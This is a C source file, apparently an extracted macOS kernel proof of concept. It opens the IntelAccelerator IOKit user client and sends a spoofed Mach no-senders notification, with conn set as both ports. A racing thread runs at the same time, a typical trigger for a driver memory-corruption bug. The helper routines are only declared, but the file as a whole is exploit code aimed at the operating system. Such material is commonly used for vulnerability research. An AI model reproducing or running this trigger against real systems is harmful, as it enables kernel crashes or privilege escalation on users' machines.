
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_4__ TYPE_2__ ;
typedef struct TYPE_3__ TYPE_1__ ;


struct spoofed_notification {int dummy; } ;
typedef int pthread_t ;
typedef scalar_t__ io_service_t ;
struct TYPE_3__ {int msgh_size; int msgh_id; int msgh_bits; scalar_t__ msgh_remote_port; scalar_t__ msgh_local_port; } ;
struct TYPE_4__ {int no_senders_count; TYPE_1__ header; } ;


 scalar_t__ IOServiceGetMatchingService (int ,int ) ;
 int IOServiceMatching (char*) ;
 int IOServiceOpen (scalar_t__,int ,int,scalar_t__*) ;
 int MACH_MSGH_BITS (int ,int ) ;
 int MACH_MSG_TYPE_COPY_SEND ;
 scalar_t__ MACH_PORT_NULL ;
 scalar_t__ conn ;
 scalar_t__ go ;
 int kIOMasterPortDefault ;
 int mach_task_self () ;
 TYPE_2__ msg ;
 int printf (char*) ;
 int pthread_create (int *,int *,void*,void*) ;
 int pthread_join (int ,int *) ;
 int send_message () ;
 int start ;
 int usleep (int) ;

int main(int argc, char** argv) {
  char* service_name = "IntelAccelerator";
  int client_type = 7;

  io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching(service_name));
  if (service == MACH_PORT_NULL) {
    printf("can't find service\n");
    return 0;
  }

  IOServiceOpen(service, mach_task_self(), client_type, &conn);
  if (conn == MACH_PORT_NULL) {
    printf("can't connect to service\n");
    return 0;
  }

  pthread_t t;
  int arg = 0;
  pthread_create(&t, ((void*)0), (void*) go, (void*) &arg);


  msg.header.msgh_size = sizeof(struct spoofed_notification);
  msg.header.msgh_local_port = conn;
  msg.header.msgh_remote_port = conn;
  msg.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_COPY_SEND);
  msg.header.msgh_id = 0106;

  msg.no_senders_count = 1000;

  usleep(100000);

  start = 1;

  send_message();

  pthread_join(t, ((void*)0));

  return 0;
}
